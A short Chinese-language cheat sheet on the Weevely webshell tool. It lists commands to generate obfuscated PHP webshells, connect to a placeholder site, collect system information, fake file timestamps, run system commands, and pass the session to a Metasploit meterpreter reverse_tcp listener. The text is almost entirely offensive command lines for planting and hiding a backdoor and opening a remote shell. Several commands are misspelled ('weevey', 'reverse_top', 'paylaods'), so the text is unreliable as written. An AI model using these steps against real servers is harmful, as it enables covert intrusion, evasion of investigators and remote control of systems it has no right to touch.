Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式
构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性。
生成shell:
♾️ abap 代码:weevely generate <password> <文件名>
//如:
weevely generate 123456 shell.php
连接shell:
♾️ abap 代码:weevely <URL> <password> [cmd]
//如
weevey http://xxxx.com/shell.php 123456
生成混淆shell:
♾️ abap 代码:weevely generate -obfuscator cleartext1_php <password> <文件名>
//如:
weevely generate -obfuscator cleartext1_php 123456 shell.php
信息收集
♾️ abap 代码::system_info //收集系统信息模块,如下
:system_info -info client_ip //查找自己连接IP
文件管理
♾️ abap 代码::file_touch //修改文件时间模块,如下
:file_touch -human-ts '2022-04-20 20:30:21' 文件名
命令执行
♾️ abap 代码::shell_php //执行PHP命令模块,如下
:shell_php system('ipconfig');
会话转移
♾️ abap 代码://在终端1中,生成meterpreter会话
:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -Ihost 本机IP -port 端口
//在终端2中,启动MSF,并设置监听会话,直到会话转移过来
service postgresq start //启动postgresql数据库
msfdb reinit //初始化msfdb
msfdb start //启动msfdb
msfconsole //启动msf
use exploit multi/handler
show paylaods
set payload php/meterpreter/reverse_top
show options
set Ihost 本机IP
run